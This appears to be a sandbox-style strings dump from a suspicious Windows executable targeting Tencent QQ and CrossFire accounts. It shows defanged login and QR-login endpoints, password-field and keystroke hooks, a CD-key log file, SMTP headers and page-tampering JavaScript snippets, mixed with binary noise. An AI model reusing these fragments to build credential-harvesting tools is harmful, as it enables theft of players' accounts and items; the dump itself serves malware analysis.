DDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGD:\
01/04/17
szNick_name=
hXXp://cdn.tgp.qq.com/cf/v3/images/level/BigClass_
hXXp://VVV.51.la/report/1_main.asp?id=18855916
hXXp://VVV.51.la/report/1_main_online.asp?id=18855916
hXXp://count.knowsky.com/count2/count.asp?id=85436&sx=1&ys=43
hXXp://count.knowsky.com/img/(.*?)/(.*?).gif
,.Ey)
qTcp,
hXXp://wpa.qq.com/msgrd?v=3&uin=138417120&site=qq&menu=yes
hXXp://apps.game.qq.com/comm-cgi-bin/content_admin/activity_center/query_role.cgi?game=cf&area=
hXXp://apps.game.qq.com/cf/a20141126main/getUserInfo.php?action=initQuery&sArea=
tEXtXML:com.adobe.xmp
<rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/"
xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/"
xmlns:dc="hXXp://purl.org/dc/elements/1.1/"
xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/"
xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#"
xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#"
xmlns:tiff="hXXp://ns.adobe.com/tiff/1.0/"
xmlns:exif="hXXp://ns.adobe.com/exif/1.0/">
<xmp:CreatorTool>Adobe Photoshop CC (Windows)</xmp:CreatorTool>
/* |xGv00|13a28bd5e87728de7241d2f04c3c02f5 */hXXp://apps.game.qq.com/cgi-bin/cf/cfvip/checkCFvipStatue.cgi?rd=0.3552593735512346&_=1459778886737
msg":"
hXXp://apps.game.qq.com/cf/cfvip/doCfVip.php?action=getCfVipInfo&rd=0.16843547895445687&_=1459479795992
hXXp://apps.game.qq.com/php/tgclub/v2/user/logininfo?callback=jQuery17209628733010031283_1459773913284&_=1459773913464
ÿF8>NFFFh
ÿFV
pt_mbkey
WinHttp.WinHttpRequest.5.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
[SKEY]
"cdkey":"(.*?)"
[%d/d/d d:d]
\CF_CDKEY.ini
hXXp://act.tgp.qq.com/index.php/
Host: act.tgp.qq.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Referer: hXXp://act.tgp.qq.com/cf/cf20160325/index.html?ADTAG=bangbang.hdsq
%7C
&user_checkparam=cf%7Cyes%7C
"msg":"
sMsg":"
sMsg":"MODULE OK"
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=
hXXp://bang.qq.com/actcenter/queryFilterActList
"url":"(.*?)"
hXXp://kf.qq.com/cgi-bin/common?rand=0.7021259550817557&command=command=C00006&fromtype=kfweb&fromtoolid=kfweb514&type=getCFSpend&area=
Referer:hXXp://kf.qq.com/game/consume_records.html?code=cf
hXXp://bbs.cf.qq.com/home.php?mod=task&do=apply&id=6
hXXp://bbs.cf.qq.com/home.php?mod=task&do=apply&id=7
hXXp://bbs.cf.qq.com/home.php?mod=task&do=apply&id=8
hXXp://bbs.cf.qq.com/home.php?mod=spacecp&ac=credit&showcredit=1
hXXp://bbs.cf.qq.com/forum.php?mod=forumdisplay&fid=30827&page=6
&extra=&replysubmit=yes&infloat=yes&handlekey=fastpost&inajax=1
hXXp://bbs.cf.qq.com/forum.php?mod=post&action=reply&fid=30827&tid=


&posttime=
hXXp://bbs.cf.qq.com/home.php?mod=task&do=draw&id=6
hXXp://bbs.cf.qq.com/home.php?mod=task&do=draw&id=7
hXXp://bbs.cf.qq.com/home.php?mod=task&do=draw&id=8
hXXp://bbs.cf.qq.com/forum.php
&searchkey=15051408311873756101000000000000&from=1&question=免费枪&vip=0&bangdou=1
%7C322%7C
*&checkparam=cf%7Cyes%7C
&ams_checkparam=cf%7Cyes%7C
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fbang.qq.com%2Fshop%2Findex%2Fcf%2F&eas_refer=&sServiceDepartment=xinyue&sServiceType=cf&sArea=
Referer:hXXp://bang.qq.com/comm-htdocs/js/ams/v0.2R02/ajaxcdr.swf
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=38135&sServiceDepartment=xinyue&set_info=xinyue
hXXp://bangbang.qq.com/php/robott3nologin/servey
Referer:hXXp://bang.qq.com/actcenter/index/cf
hXXp://bang.qq.com/ugc1/getActRecommend
game=cf&mid=0&eid=5&surl=http://bangbang.qq.com/php/login?game=cf&durl=http://bang.qq.com/actcenter/index/cf?&ref=ingame01&ref=ingame01
hXXp://bang.qq.com/user/scorePersonalAcenter
Referer: hXXp://bang.qq.com/main/tradeinfo/
game=bangbang&mid=9&eid=9000&surl=http://bang.qq.com/main/tradeinfo/&durl=http://bang.qq.com/main/tradeinfo/&world=0&serviceType=2&ref=
hXXp://bang.qq.com/user/scorePersonal
hXXp://bang.qq.com/comm-htdocs/js/ams/v0.2R02/ajaxcdr.swf
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=38135&sServiceDepartment=group_f
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Fjudou2.0%2Fcf.shtml&eas_refer=&sServiceDepartment=djc&sServiceType=dj
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=dj&iActivityId=11117&sServiceDepartment=djc&set_info=djc
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Fjudou2.0%2Fcf.shtml&eas_refer=&sServiceDepartment=djc
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=dj&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=11117&iFlowId=96910&g_tk=
Referer:hXXp://daoju.qq.com/comm-htdocs/js/milo/ajaxcdr.swf?0.9721381550078127
hXXp://djcapp.game.qq.com/daoju/v3/api/app/e_app/add_jf_firstlogin.php?appSource=ios&appVersion=35&sDeviceID=&p_tk=
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Ftask.shtml&eas_refer=&sServiceDepartment=djc
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=dj&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=35644&iFlowId=204638&g_tk=
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=dj&iActivityId=35644&sServiceDepartment=djc&set_info=djc
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=23314&callback=vipSignNew.signCb&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?actid=52002&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=22249&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?actid=23074&g_tk_type=1&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=54963&callback=vipSignNew.signCb&g_tk=
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fxinyue.qq.com%2Fweb201410%2Fwebgame.shtml&eas_refer=http%3A%2F%2Fxinyue.qq.com%2Fweb201410%2Fwebgame.shtml&sServiceDepartment=xinyue&sServiceType=tgclub
Referer: hXXp://xinyue.qq.com/comm-htdocs/js/milo/ajaxcdr.swf?0.7271989360451698
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=21547&sServiceDepartment=xinyue&set_info=xinyue
hXXp://starvip.qq.com/fcg-bin/v2/fcg_mobile_starvip_site_checkin?g_tk=
&_=1454839692917
hXXp://x.pet.qq.com/vip_platform?cmd=set_sign_info&timer=1454839703753&callback=jQuery110205429354978259653_1454839692914&token=
msg": "
&pvsrc=102&s_p=0|http|&s_v=6.1.0.496&ozid=511022&vipid=&actid=68391&sid=&callback=json14530355412865&cache=3654
hXXp://iyouxi.vip.qq.com/ams3.0.php?g_tk=
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4
hXXp://proxy.vac.qq.com/cgi-bin/srfentry.fcgi?ts=1456988761581&g_tk=
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13D15 QQ/6.2.2.402 Pixel/640 NetType/WIFI Mem/86
&_=1452520903377
hXXp://pay.video.qq.com/fcgi-bin/sign?callback=jQuery111006800204519842937_1452520903238&low_login=1&uin=
hXXp://buluo.qq.com/cgi-bin/bar/card/bar_list_by_page
hXXp://buluo.qq.com/cgi-bin/bar/user/sign
hXXp://qun.qzone.qq.com/cgi-bin/get_group_list?uin=
hXXp://qiandao.qun.qq.com/cgi-bin/new_flag
hXXp://qiandao.qun.qq.com/cgi-bin/sign
hXXp://c.pc.qq.com/fcgi-bin/signin?callback=jsonp1453084008086&_=1453084046097&mood_id=238&checkin_date=&remark=一支穿云箭 千军万马来相见。
08 08 08 50
hXXp://cfzhushou.com/cfzs/help.html
hXXp://cfzhushou.com/help.html
hXXp://VVV.cfzhushou.com/cfzs/help.html
hXXp://ip.qq.com/cgi-bin/myip
hXXps://aq.qq.com/cn2/safe_service/device_lock
hXXp://ossweb-img.qq.com/images/clientpop/act/cf/GpmHelpAct.js
http2://ossweb
hXXp://ossweb
"img":"http2(.*?).jpg"
"hXXp://(.*?)":{
"~ /1~!<
fD.nn'1r?
.KM8'
$&%cw]
hXXp://leesin.zuhaowan.com-
hXXp://leesin.zuhaowan.cn
hXXp://captcha.qq.com/getimage?aid=210001040.5721703316085041
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=41615&sServiceDepartment=group_f
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=qqgame&iActivityId=41615&sServiceDepartment=group_h&set_info=group_h
hXXp://webd.tgp.qq.com/cf/info_proxy/weapon_stat_info?&&zone_id=
1970.01.01 08:00:00
function timea(){var d,s;d=new Date();d.setTime('
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=55856&sServiceDepartment=group_f
hXXp://apps.game.qq.com/cf/a20160726hxb/getUserTask.php?action=getMyTaskList&iArea=
Referer:hXXp://cf.qq.com/act/a20160726hxb/index.htm
hXXp://apps.game.qq.com/daoju/appmarket/daoju_promotion/cloud_ticket/QueryCloudTicket.php?acctid=A100078&id=28&time=0.23177661886438727&_=1461381268102
"sMsg":"MODULE OK"
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fbang.qq.com%2Fshop%2Findex%2Fcf%2F&eas_refer=http%3A%2F%2Fbang.qq.com%2Fmain%2Ftradeinfo%2F&sServiceDepartment=xinyue
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=tgclub&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=38135&iFlowId=
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=38135&sServiceDepartment=xinyue&set_info=xinyue
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=tgclub&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=38135&iFlowId=214216&g_tk=
|322|
*&checkparam=cf|yes|
&ams_checkparam=cf|yes|
sCdKey=
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=8918&sServiceDepartment=x1m1
sMsg" : "
\gzip.dll
`.data
gzip.pdb
_u%SV
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
hXXp://apps.game.qq.com/cgi-bin/cf/a20090409forceout/getinfo.cgi
hXXp://VVV.cfzhushou.com/app/
hXXp://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=21000124&s_url=hXXp://cf.qq.com&style=34
hXXps://ssl.ptlogin2.qq.com/ptqrshow?appid=21000124&e=2&l=M&s=3&d=72&v=4&t=0.8120921131107115&daid=8
hXXps://ssl.ptlogin2.qq.com/ptqrlogin?u1=hXXp://cf.qq.com&ptqrtoken=#{ptqrtoken}&ptredirect=1&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=0-1-1491575693107&js_ver=10210&js_type=1&login_sig=#{login_sig}&pt_uistyle=40&aid=21000124&daid=8&has_onekey=1&
#{login_sig}
('0','0','
&js_ver=10210&js_type=1&login_sig=4I5ZCJhgOyvHYIR7edjyKchOesPKbLWadY1YKeoQHyTQu63TEXeJCdU6UZgyOeKv&pt_uistyle=34&aid=549000912&
hXXps://ssl.ptlogin2.qq.com/ptqrlogin?u1=hXXps://qzone.qq.com&ptredirect=1&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=0-0-
for(var e=0,i=0,n=t.length;n>i;  i)
e =(e<<5) t.charCodeAt(i);
hXXps://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=21000124&s_url=hXXp://cf.qq.com/comm-htdocs/login/logincallback.htm&style=34
hXXp://cf.qq.com/cfvip/
hXXp://xinyue.qq.com
o%%co
``PBi %c
<\-M}*0_
{56FDF344-FD6D-11d0-958A-006097C9A090}
{EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF}
Report
themepassword
SysShadow.HostWnd
{6AEDBD6D-3FB5-418A-83A6-7F45229DC872}
VBScript.RegExp
1970-01-01 00:00:00
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: image/gif, image/bmp, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
background(?:-image)?:.*?[\s]*?url[\s]*?\([#
']?(.*?)[#
onkeydown|
onkeyup|
onkeypress|
wA{0002DF05-0000-0000-C000-000000000046}
{D30C1661-CDAF-11D0-8A3E-00C04FC9E26E}
{6D5140C1-7436-11CE-8034-00AA006009FA}
text|password|file
?)-D%f`
location.reload()
window.location.href="
{25336920-03F9-11CF-8FD0-00AA00686F13}
hXXp://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js
document.all.retjs.innerText=
javascript:document.body.contentEditable='true';document.designMode='on';void 0;
javascript:document.body.contentEditable='false';document.designMode='on';void 0;
javascript:document.onsdragstart=document.onselectstart=document.oncontextmenu=function(){return true}
javascript:document.onselectstart = document.oncontextmenu = document.onmousedown = document.onkeydown = function(){return true;};
WarnOnHTTPSToHTTPRedirect
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
type=password
[password]
var jies = document.getElementsByTagName('object');for(var jie in jies){if(jies[jie].classid=='clsid:D27CDB6E-AE6D-11cf-96B8-444553540000'){jies[jie].removeNode(true);}}
user.qzone.qq.com
mail.qq.com
onkeyup
type='password'
type="password"
, 1, , ,
var jie = document.createStyleSheet();jie.addRule('html','
').value="
document.getElementById('
LocationURL
{34A715A0-6587-11D0-924A-0020AFC7AC4D}
window.location.reload()
var jie = document.createStyleSheet();jie.addRule('html','overflow:hidden;');
{557CF400-1A04-11D3-9A73-0000F81EF32E}
{557CF401-1A04-11D3-9A73-0000F81EF32E}
{557CF402-1A04-11D3-9A73-0000F81EF32E}
{557CF405-1A04-11D3-9A73-0000F81EF32E}
{557CF406-1A04-11D3-9A73-0000F81EF32E}
SysShadow.Menu
Microsoft.XMLDOM
HKEY_CURRENT_CONFIG
14:00~16:00
12:00-19:00
1.2.18
%*.*f
MSWHEEL_ROLLMSG
WSOCK32.dll
msscript.ocx
VVV.dywt.com.cn
USER32.DLL
\\.\Smartvsd
\\.\PhysicalDrive%d
\\.\Scsi%d:
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
;3 #>6.&
'2, / 0&7!4-)1#
(*.htm;*.html)|*.htm;*.html
its:%s::%s
(*.avi)|*.avi
WPFT532.CNV
WPFT632.CNV
EXCEL32.CNV
write32.wpc
Windows Write
mswrd632.wpc
Word for Windows 6.0
wword5.cnv
Word for Windows 5.0
mswrd832.cnv
mswrd632.cnv
Word 6.0/95 for Windows & Macintosh
html32.cnv
.PAVCOleException@@
.PAVCOleDispatchException@@
right-curly-bracket
left-curly-bracket
0123456789
c:\%original file name%.exe
GetKeyboardState
InternetCanonicalizeUrlA
:X.xZ
1.0.15.507
T%Program Files%\NamuADLook.dll
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
VVV.kubei9.com
VVV.kubei9.com
1.3.6.1
(*.*)
1.0.0.0
6.0.2600.0 (xpclient.010817-1148)
6.0.2600.0

%original file name%.exe_4032_rwx_01CC0000_00013000:


txservices.exe_760:


sesvcs_963_56089.exe_2324:


%original file name%.exe_4032_rwx_10001000_00033000:


sesvcs_963_56089.exe_2324_rwx_0142F000_00216000:

IBBON_PANEL_MAIN-BLACK_IDB_OFFICE2007_RIBBON_PANEL_MAIN_BORDER%BLACK_IDB_OFFICE2007_RIBBON_PANEL_QAT BLACK_IDB_OFFICE2007_RIBBON_PANEL_SEPARATOR)BLACK_IDB_OFFICE2007_RIBBON_PROGRESS_BACK-BLACK_IDB_OFFICE2007_RIBBON_PROGRESS_INFINITY BLACK_IDB_OFFICE2007_RIBBON_PROGRESS_NORMAL/BLACK_IDB_OFFICE2007_RIBBON_PROGRESS_NORMAL_EXT,BLACK_IDB_OFFICE2007_RIBBON_SLIDER_BTN_MINUS BLACK_IDB_OFFICE2007_RIBBON_SLIDER_BTN_PLUS(BLACK_IDB_OFFICE2007_RIBBON_SLIDER_THUMB#BLACK_IDB_OFFICE2007_STATUSBAR_BACK'BLACK_IDB_OFFICE2007_STATUSBAR_BACK_EXT)BLACK_IDB_OFFICE2007_STATUSBAR_PANEBORDER&BLACK_IDB_OFFICE2007_STATUSBAR_SIZEBOX!BLACK_IDB_OFFICE2007_SYS_BTN_BACK#BLACK_IDB_OFFICE2007_SYS_BTN_BACK_S"BLACK_IDB_OFFICE2007_SYS_BTN_CLOSE$BLACK_IDB_OFFICE2007_SYS_BTN_CLOSE_S%BLACK_IDB_OFFICE2007_SYS_BTN_MAXIMIZE'BLACK_IDB_OFFICE2007_SYS_BTN_MAXIMIZE_S%BLACK_IDB_OFFICE2007_SYS_BTN_MINIMIZE'BLACK_IDB_OFFICE2007_SYS_BTN_MINIMIZE_S$BLACK_IDB_OFFICE2007_SYS_BTN_RESTORE&BLACK_IDB_OFFICE2007_SYS_BTN_RESTORE_S
BLUE_IDB_OFFICE2007_MENU_BTN%BLUE_IDB_OFFICE2007_MENU_BTN_DISABLED%BLUE_IDB_OFFICE2007_MENU_BTN_SCROLL_T BLUE_IDB_OFFICE2007_MENU_BTN_VERT_SEPARATOR"BLUE_IDB_OFFICE2007_MENU_ITEM_BACK&BLUE_IDB_OFFICE2007_MENU_ITEM_MARKER_C&BLUE_IDB_OFFICE2007_MENU_ITEM_MARKER_R$BLUE_IDB_OFFICE2007_OUTLOOK_BAR_BACK$BLUE_IDB_OFFICE2007_OUTLOOK_BTN_PAGE$BLUE_IDB_OFFICE2007_POPUPMENU_BORDER'BLUE_IDB_OFFICE2007_POPUPMENU_RESIZEBAR/BLUE_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_HV0BLUE_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_HVT.BLUE_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_V(BLUE_IDB_OFFICE2007_RIBBON_BORDER_FLOATY%BLUE_IDB_OFFICE2007_RIBBON_BORDER_QAT$BLUE_IDB_OFFICE2007_RIBBON_BTN_CHECK&BLUE_IDB_OFFICE2007_RIBBON_BTN_DEFAULT BLUE_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_ICON,BLUE_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_IMAGE*BLUE_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_QAT/BLUE_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_QAT_ICON,BLUE_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_F_C,BLUE_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_F_M,BLUE_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_L_C,BLUE_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_L_M,BLUE_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_M_C,BLUE_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_M_M&BLUE_IDB_OFFICE2007_RIBBON_BTN_GROUP_F&BLUE_IDB_OFFICE2007_RIBBON_BTN_GROUP_L&BLUE_IDB_OFFICE2007_RIBBON_BTN_GROUP_M&BLUE_IDB_OFFICE2007_RIBBON_BTN_GROUP_S%BLUE_IDB_OFFICE2007_RIBBON_BTN_LAUNCH*BLUE_IDB_OFFICE2007_RIBBON_BTN_LAUNCH_ICON#BLUE_IDB_OFFICE2007_RIBBON_BTN_MAIN'BLUE_IDB_OFFICE2007_RIBBON_BTN_MENU_H_C'BLUE_IDB_OFFICE2007_RIBBON_BTN_MENU_H_M'BLUE_IDB_OFFICE2007_RIBBON_BTN_MENU_V_C'BLUE_IDB_OFFICE2007_RIBBON_BTN_MENU_V_M'BLUE_IDB_OFFICE2007_RIBBON_BTN_NORMAL_B'BLUE_IDB_OFFICE2007_RIBBON_BTN_NORMAL_S%BLUE_IDB_OFFICE2007_RIBBON_BTN_PAGE_L%BLUE_IDB_OFFICE2007_RIBBON_BTN_PAGE_R(BLUE_IDB_OFFICE2007_RIBBON_BTN_PALETTE_B(BLUE_IDB_OFFICE2007_RIBBON_BTN_PALETTE_M(BLUE_IDB_OFFICE2007_RIBBON_BTN_PALETTE_T)BLUE_IDB_OFFICE2007_RIBBON_BTN_PANEL_MAIN*BLUE_IDB_OFFICE2007_RIBBON_BTN_STATUS_PANE%BLUE_IDB_OFFICE2007_RIBBON_CAPTION_QA 
BLUE_IDB_OFFICE2007_RIBBON_CAPTION_QA_GLASS(BLUE_IDB_OFFICE2007_RIBBON_CATEGORY_BACK'BLUE_IDB_OFFICE2007_RIBBON_CATEGORY_TAB BLUE_IDB_OFFICE2007_RIBBON_CATEGORY_TAB_SEP0BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_B_BTN_DEFAULT2BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_BACK5BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_CAPTION1BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_TAB0BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_G_BTN_DEFAULT2BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_BACK5BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_CAPTION1BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_TAB0BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_I_BTN_DEFAULT2BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_BACK5BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_CAPTION1BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_TAB0BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_O_BTN_DEFAULT2BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_BACK5BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_CAPTION1BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_TAB/BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_PANEL_BACK_B/BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_PANEL_BACK_T0BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_R_BTN_DEFAULT2BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_BACK5BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_CAPTION1BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_TAB,BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_SEPARATOR0BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_V_BTN_DEFAULT2BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_BACK5BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_CAPTION1BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_TAB0BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_Y_BTN_DEFAULT2BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_BACK5BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_CAPTION1BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_TAB&BLUE_IDB_OFFICE2007_RIBBON_KEYTIP_BACK'BLUE_IDB_OFFICE2007_RIBBON_PANEL_BACK_B'BLUE_IDB_OFFICE2007_RIBBON_PANEL_BACK_T%BLUE_IDB_OFFICE2007_RIBBON_PANEL_MAIN,BLUE_IDB_OFFICE2007_RIBBON_PANEL_MAIN_BORDER$BLUE_IDB_OFFICE2007_RIBBON_PANEL_QAT*BLUE_IDB_OFFICE2007_RIB
BON_PANEL_SEPARATOR(BLUE_IDB_OFFICE2007_RIBBON_PROGRESS_BACK,BLUE_IDB_OFFICE2007_RIBBON_PROGRESS_INFINITY*BLUE_IDB_OFFICE2007_RIBBON_PROGRESS_NORMAL.BLUE_IDB_OFFICE2007_RIBBON_PROGRESS_NORMAL_EXT BLUE_IDB_OFFICE2007_RIBBON_SLIDER_BTN_MINUS*BLUE_IDB_OFFICE2007_RIBBON_SLIDER_BTN_PLUS'BLUE_IDB_OFFICE2007_RIBBON_SLIDER_THUMB"BLUE_IDB_OFFICE2007_STATUSBAR_BACK&BLUE_IDB_OFFICE2007_STATUSBAR_BACK_EXT(BLUE_IDB_OFFICE2007_STATUSBAR_PANEBORDER%BLUE_IDB_OFFICE2007_STATUSBAR_SIZEBOX BLUE_IDB_OFFICE2007_SYS_BTN_BACK"BLUE_IDB_OFFICE2007_SYS_BTN_BACK_S!BLUE_IDB_OFFICE2007_SYS_BTN_CLOSE#BLUE_IDB_OFFICE2007_SYS_BTN_CLOSE_S$BLUE_IDB_OFFICE2007_SYS_BTN_MAXIMIZE&BLUE_IDB_OFFICE2007_SYS_BTN_MAXIMIZE_S$BLUE_IDB_OFFICE2007_SYS_BTN_MINIMIZE&BLUE_IDB_OFFICE2007_SYS_BTN_MINIMIZE_S#BLUE_IDB_OFFICE2007_SYS_BTN_RESTORE%BLUE_IDB_OFFICE2007_SYS_BTN_RESTORE_S
SILVER_IDB_OFFICE2007_MENU_BTN'SILVER_IDB_OFFICE2007_MENU_BTN_DISABLED'SILVER_IDB_OFFICE2007_MENU_BTN_SCROLL_T-SILVER_IDB_OFFICE2007_MENU_BTN_VERT_SEPARATOR$SILVER_IDB_OFFICE2007_MENU_ITEM_BACK(SILVER_IDB_OFFICE2007_MENU_ITEM_MARKER_C(SILVER_IDB_OFFICE2007_MENU_ITEM_MARKER_R&SILVER_IDB_OFFICE2007_OUTLOOK_BAR_BACK&SILVER_IDB_OFFICE2007_OUTLOOK_BTN_PAGE&SILVER_IDB_OFFICE2007_POPUPMENU_BORDER)SILVER_IDB_OFFICE2007_POPUPMENU_RESIZEBAR1SILVER_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_HV2SILVER_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_HVT0SILVER_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_V*SILVER_IDB_OFFICE2007_RIBBON_BORDER_FLOATY'SILVER_IDB_OFFICE2007_RIBBON_BORDER_QAT&SILVER_IDB_OFFICE2007_RIBBON_BTN_CHECK(SILVER_IDB_OFFICE2007_RIBBON_BTN_DEFAULT-SILVER_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_ICON.SILVER_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_IMAGE,SILVER_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_QAT1SILVER_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_QAT_ICON.SILVER_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_F_C.SILVER_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_F_M.SILVER_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_L_C